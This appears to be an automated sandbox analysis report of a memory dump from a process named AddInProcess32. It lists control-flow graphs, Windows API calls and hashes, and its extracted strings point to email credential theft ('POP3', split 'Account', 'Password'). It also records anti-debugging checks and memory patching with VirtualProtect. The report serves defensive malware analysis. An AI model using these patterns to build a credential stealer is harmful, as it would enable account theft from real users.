                                                      control_flow_graph 79 1000c7a7-1000c7bc 80 1000c82d 79->80 81 1000c7be-1000c7c6 79->81 83 1000c82f-1000c833 80->83 81->80 82 1000c7c8-1000c7f6 call 1000c7e6 81->82 91 1000c7f8 82->91 92 1000c86c-1000c86e 82->92 85 1000c872 call 1000c877 83->85 86 1000c835-1000c83d GetModuleHandleA 83->86 89 1000c83f-1000c847 86->89 89->89 90 1000c849-1000c84c 89->90 90->83 93 1000c84e-1000c850 90->93 96 1000c7fa-1000c7fe 91->96 97 1000c85b-1000c85e 91->97 94 1000c870 92->94 95 1000c866-1000c86b 92->95 98 1000c852-1000c854 93->98 99 1000c856-1000c85a 93->99 94->90 95->92 102 1000c865 96->102 103 1000c800-1000c80b GetProcAddress 96->103 100 1000c85f-1000c860 GetProcAddress 97->100 98->100 99->97 100->102 102->95 103->80 104 1000c80d-1000c81a VirtualProtect 103->104 105 1000c82c 104->105 106 1000c81c-1000c82a VirtualProtect 104->106 105->80 106->105
                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                        • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                        • Part of subcall function 1000C7E6: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                        • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                        • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.2937213411.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000010.00000002.2937108954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000010.00000002.2937213411.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_10000000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: AddressHandleModuleProcProtectVirtual
                                                      • String ID:
                                                      • API String ID: 2099061454-0
                                                      • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                      • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                                                      • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                      • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 107 1000c803-1000c80b GetProcAddress 108 1000c82d 107->108 109 1000c80d-1000c81a VirtualProtect 107->109 112 1000c82f-1000c833 108->112 110 1000c82c 109->110 111 1000c81c-1000c82a VirtualProtect 109->111 110->108 111->110 113 1000c872 call 1000c877 112->113 114 1000c835-1000c83d GetModuleHandleA 112->114 116 1000c83f-1000c847 114->116 116->116 117 1000c849-1000c84c 116->117 117->112 118 1000c84e-1000c850 117->118 119 1000c852-1000c854 118->119 120 1000c856-1000c85e 118->120 121 1000c85f-1000c865 GetProcAddress 119->121 120->121 124 1000c866-1000c86e 121->124 126 1000c870 124->126 126->117
                                                      APIs
                                                      • GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                      • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                      • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                      • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.2937213411.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000010.00000002.2937108954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000010.00000002.2937213411.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_10000000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: AddressProcProtectVirtual$HandleModule
                                                      • String ID:
                                                      • API String ID: 2152742572-0
                                                      • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                      • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                                                      • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                      • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE
                                                      APIs
                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 100061E4
                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 100061F1
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.2937213411.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000010.00000002.2937108954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000010.00000002.2937213411.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_10000000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                      • String ID:
                                                      • API String ID: 3906539128-0
                                                      • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                      • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                                                      • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                      • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                                                      • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                                                      • ExitProcess.KERNEL32 ref: 10004AEE
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.2937213411.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000010.00000002.2937108954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000010.00000002.2937213411.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_10000000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: Process$CurrentExitTerminate
                                                      • String ID:
                                                      • API String ID: 1703294689-0
                                                      • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                      • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                                                      • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                      • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.2937213411.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000010.00000002.2937108954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000010.00000002.2937213411.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_10000000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .
                                                      • API String ID: 0-248832578
                                                      • Opcode ID: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                      • Instruction ID: 9046c4836333a0efab45ea1e09b7d9ff5bbd95f87beecc7c41f4b92e1cb642f0
                                                      • Opcode Fuzzy Hash: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                      • Instruction Fuzzy Hash: 45313771800159AFEB14CF74CC84EEA7BBEDB49384F200198F81997259E6319E448B60
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.2937213411.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000010.00000002.2937108954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000010.00000002.2937213411.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_10000000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: HeapProcess
                                                      • String ID:
                                                      • API String ID: 54951025-0
                                                      • Opcode ID: 460c158515a4b2323efe0f0dc9aa5714cfdfaf7ec70cb60f3b96f32d1927db1d
                                                      • Instruction ID: 1e6cba0042ebf2c12c09a4b69519b161692f08ba8376aa17aabccb2fe2e68a66
                                                      • Opcode Fuzzy Hash: 460c158515a4b2323efe0f0dc9aa5714cfdfaf7ec70cb60f3b96f32d1927db1d
                                                      • Instruction Fuzzy Hash: 81A01130A002228FE3208F308A8A30E3AACAA002C0B00803AE80CC0028EB30C0028B00

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 136 1000173a-100017fe call 1000c030 call 10002c40 * 2 143 10001803 call 10001cca 136->143 144 10001808-1000180c 143->144 145 10001812-10001816 144->145 146 100019ad-100019b1 144->146 145->146 147 1000181c-10001837 call 10001ede 145->147 150 1000183d-10001845 147->150 151 1000199f-100019ac call 10001ee7 * 2 147->151 153 10001982-10001985 150->153 154 1000184b-1000184e 150->154 151->146 156 10001995-10001999 153->156 157 10001987 153->157 154->153 158 10001854-10001881 call 100044b0 * 2 call 10001db7 154->158 156->150 156->151 161 1000198a-1000198d call 10002c40 157->161 170 10001887-1000189f call 100044b0 call 10001db7 158->170 171 1000193d-10001943 158->171 166 10001992 161->166 166->156 170->171 187 100018a5-100018a8 170->187 172 10001945-10001947 171->172 173 1000197e-10001980 171->173 172->173 175 10001949-1000194b 172->175 173->161 177 10001961-1000197c call 100016aa 175->177 178 1000194d-1000194f 175->178 177->166 180 10001951-10001953 178->180 181 10001955-10001957 178->181 180->177 180->181 184 10001959-1000195b 181->184 185 1000195d-1000195f 181->185 184->177 184->185 185->173 185->177 188 100018c4-100018dc call 100044b0 call 10001db7 187->188 189 100018aa-100018c2 call 100044b0 call 10001db7 187->189 188->156 198 100018e2-1000193b call 100016aa call 100015da call 10002c40 * 2 188->198 189->188 189->198 198->156
                                                      APIs
                                                        • Part of subcall function 10001CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                        • Part of subcall function 10001CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                        • Part of subcall function 10001CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                      • _strlen.LIBCMT ref: 10001855
                                                      • _strlen.LIBCMT ref: 10001869
                                                      • _strlen.LIBCMT ref: 1000188B
                                                      • _strlen.LIBCMT ref: 100018AE
                                                      • _strlen.LIBCMT ref: 100018C8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.2937213411.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000010.00000002.2937108954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000010.00000002.2937213411.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_10000000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: _strlen$File$CopyCreateDelete
                                                      • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                      • API String ID: 3296212668-3023110444
                                                      • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                      • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                                      • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                      • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.2937213411.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000010.00000002.2937108954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000010.00000002.2937213411.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_10000000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: _strlen
                                                      • String ID: %m$~$Gon~$~F@7$~dra
                                                      • API String ID: 4218353326-230879103
                                                      • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                      • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                                                      • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                      • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 276 10007cc2-10007cd6 277 10007d44-10007d4c 276->277 278 10007cd8-10007cdd 276->278 280 10007d93-10007dab call 10007e35 277->280 281 10007d4e-10007d51 277->281 278->277 279 10007cdf-10007ce4 278->279 279->277 282 10007ce6-10007ce9 279->282 290 10007dae-10007db5 280->290 281->280 284 10007d53-10007d90 call 1000571e * 4 281->284 282->277 285 10007ceb-10007cf3 282->285 284->280 288 10007cf5-10007cf8 285->288 289 10007d0d-10007d15 285->289 288->289 292 10007cfa-10007d0c call 1000571e call 100090ba 288->292 295 10007d17-10007d1a 289->295 296 10007d2f-10007d43 call 1000571e * 2 289->296 293 10007dd4-10007dd8 290->293 294 10007db7-10007dbb 290->294 292->289 298 10007df0-10007dfc 293->298 299 10007dda-10007ddf 293->299 302 10007dd1 294->302 303 10007dbd-10007dc0 294->303 295->296 304 10007d1c-10007d2e call 1000571e call 100091b8 295->304 296->277 298->290 311 10007dfe-10007e0b call 1000571e 298->311 308 10007de1-10007de4 299->308 309 10007ded 299->309 302->293 303->302 313 10007dc2-10007dd0 call 1000571e * 2 303->313 304->296 308->309 316 10007de6-10007dec call 1000571e 308->316 309->298 313->302 316->309
                                                      APIs
                                                      • ___free_lconv_mon.LIBCMT ref: 10007D06
                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                      • _free.LIBCMT ref: 10007CFB
                                                        • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                        • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                      • _free.LIBCMT ref: 10007D1D
                                                      • _free.LIBCMT ref: 10007D32
                                                      • _free.LIBCMT ref: 10007D3D
                                                      • _free.LIBCMT ref: 10007D5F
                                                      • _free.LIBCMT ref: 10007D72
                                                      • _free.LIBCMT ref: 10007D80
                                                      • _free.LIBCMT ref: 10007D8B
                                                      • _free.LIBCMT ref: 10007DC3
                                                      • _free.LIBCMT ref: 10007DCA
                                                      • _free.LIBCMT ref: 10007DE7
                                                      • _free.LIBCMT ref: 10007DFF
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.2937213411.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000010.00000002.2937108954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000010.00000002.2937213411.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_10000000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                      • String ID:
                                                      • API String ID: 161543041-0
                                                      • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                      • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                                      • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                      • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14

                                                      Control-flow Graph

                                                      APIs
                                                      • _free.LIBCMT ref: 100059EA
                                                        • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                        • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                      • _free.LIBCMT ref: 100059F6
                                                      • _free.LIBCMT ref: 10005A01
                                                      • _free.LIBCMT ref: 10005A0C
                                                      • _free.LIBCMT ref: 10005A17
                                                      • _free.LIBCMT ref: 10005A22
                                                      • _free.LIBCMT ref: 10005A2D
                                                      • _free.LIBCMT ref: 10005A38
                                                      • _free.LIBCMT ref: 10005A43
                                                      • _free.LIBCMT ref: 10005A51
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.2937213411.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000010.00000002.2937108954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000010.00000002.2937213411.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_10000000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                      • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                                      • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                      • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84

                                                      Control-flow Graph

                                                      APIs
                                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                      • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D72
                                                      • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D7D
                                                      • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D8A
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.2937213411.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000010.00000002.2937108954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000010.00000002.2937213411.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_10000000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                      • String ID:
                                                      • API String ID: 1454806937-0
                                                      • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                      • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                                      • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                      • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 377 10009492-100094ef GetConsoleCP 378 10009632-10009644 call 10002ada 377->378 379 100094f5-10009511 377->379 381 10009513-1000952a 379->381 382 1000952c-1000953d call 10007c19 379->382 384 10009566-10009575 call 100079e6 381->384 389 10009563-10009565 382->389 390 1000953f-10009542 382->390 384->378 391 1000957b-1000959b WideCharToMultiByte 384->391 389->384 392 10009548-1000955a call 100079e6 390->392 393 10009609-10009628 390->393 391->378 394 100095a1-100095b7 WriteFile 391->394 392->378 399 10009560-10009561 392->399 393->378 396 100095b9-100095ca 394->396 397 1000962a-10009630 GetLastError 394->397 396->378 400 100095cc-100095d0 396->400 397->378 399->391 401 100095d2-100095f0 WriteFile 400->401 402 100095fe-10009601 400->402 401->397 403 100095f2-100095f6 401->403 402->379 404 10009607 402->404 403->378 405 100095f8-100095fb 403->405 404->378 405->402
                                                      APIs
                                                      • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,10009C07,?,00000000,?,00000000,00000000), ref: 100094D4
                                                      • __fassign.LIBCMT ref: 1000954F
                                                      • __fassign.LIBCMT ref: 1000956A
                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                      • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000,?,?,?,?,?,?,?,?,?,10009C07,?), ref: 100095AF
                                                      • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000,?,?,?,?,?,?,?,?,?,10009C07,?), ref: 100095E8
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.2937213411.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000010.00000002.2937108954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000010.00000002.2937213411.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_10000000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                      • String ID:
                                                      • API String ID: 1324828854-0
                                                      • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                      • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                      • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                      • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 406 10003370-100033b5 call 10003330 call 100037a7 411 10003416-10003419 406->411 412 100033b7-100033c9 406->412 413 10003439-10003442 411->413 414 1000341b-10003428 call 10003790 411->414 412->413 415 100033cb 412->415 418 1000342d-10003436 call 10003330 414->418 417 100033d0-100033e7 415->417 419 100033e9-100033f7 call 10003740 417->419 420 100033fd 417->420 418->413 427 100033f9 419->427 428 1000340d-10003414 419->428 421 10003400-10003405 420->421 421->417 424 10003407-10003409 421->424 424->413 429 1000340b 424->429 430 10003443-1000344c 427->430 431 100033fb 427->431 428->418 429->418 432 10003486-10003496 call 10003774 430->432 433 1000344e-10003455 430->433 431->421 439 10003498-100034a7 call 10003790 432->439 440 100034aa-100034c6 call 10003330 call 10003758 432->440 433->432 434 10003457-10003466 call 1000bbe0 433->434 442 10003483 434->442 443 10003468-10003480 434->443 439->440 442->432 443->442
                                                      APIs
                                                      • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                      • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                      • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.2937213411.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000010.00000002.2937108954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000010.00000002.2937213411.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_10000000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                      • String ID: csm
                                                      • API String ID: 1170836740-1018135373
                                                      • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                      • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                      • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                      • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                      • _free.LIBCMT ref: 100092AB
                                                        • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                        • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                      • _free.LIBCMT ref: 100092B6
                                                      • _free.LIBCMT ref: 100092C1
                                                      • _free.LIBCMT ref: 10009315
                                                      • _free.LIBCMT ref: 10009320
                                                      • _free.LIBCMT ref: 1000932B
                                                      • _free.LIBCMT ref: 10009336
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.2937213411.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000010.00000002.2937108954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000010.00000002.2937213411.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_10000000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                      • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                      • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
